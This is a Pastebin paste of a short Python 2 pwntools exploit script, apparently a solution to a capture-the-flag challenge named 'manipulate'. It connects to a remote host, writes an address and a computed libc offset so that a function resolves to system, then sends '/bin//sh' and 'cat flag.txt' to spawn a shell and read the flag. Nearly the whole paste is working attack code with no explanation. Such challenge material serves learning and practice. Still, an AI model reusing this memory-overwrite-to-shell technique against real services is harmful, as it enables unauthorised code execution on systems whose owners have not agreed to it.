Advertisement
Guest User

Untitled

a guest
Oct 18th, 2019
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. #!/usr/bin/env python2
  2.  
  3. import sys,os
  4. from pwn import *
  5.  
  6. HOST="13.56.97.226"
  7. PORT=1337
  8.  
  9. TARGET=os.path.realpath("manipulate")
  10. LIBRARY=""
  11.  
  12. systembase=0x45390
  13. changeaddr=0x404048
  14. changebase=0x36e80
  15.  
  16. def exploit(r):
  17.  
  18. for i in range(5):r.recvline()
  19.  
  20. r.sendline('1')
  21. r.recvline()
  22. r.sendline(str(hex(changeaddr)[2:]))
  23. r.recvline()
  24. r.sendline(str(systembase-changebase))
  25.  
  26. for i in range(6):r.recvline()
  27. r.sendline('/bin//sh')
  28. r.sendline('cat flag.txt')
  29. print r.recvline()
  30. r.close()
  31. return
  32.  
  33. if __name__ == "__main__":
  34. r = remote(HOST, PORT)
  35. exploit(r)
  36.  
  37. sys.exit(0)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement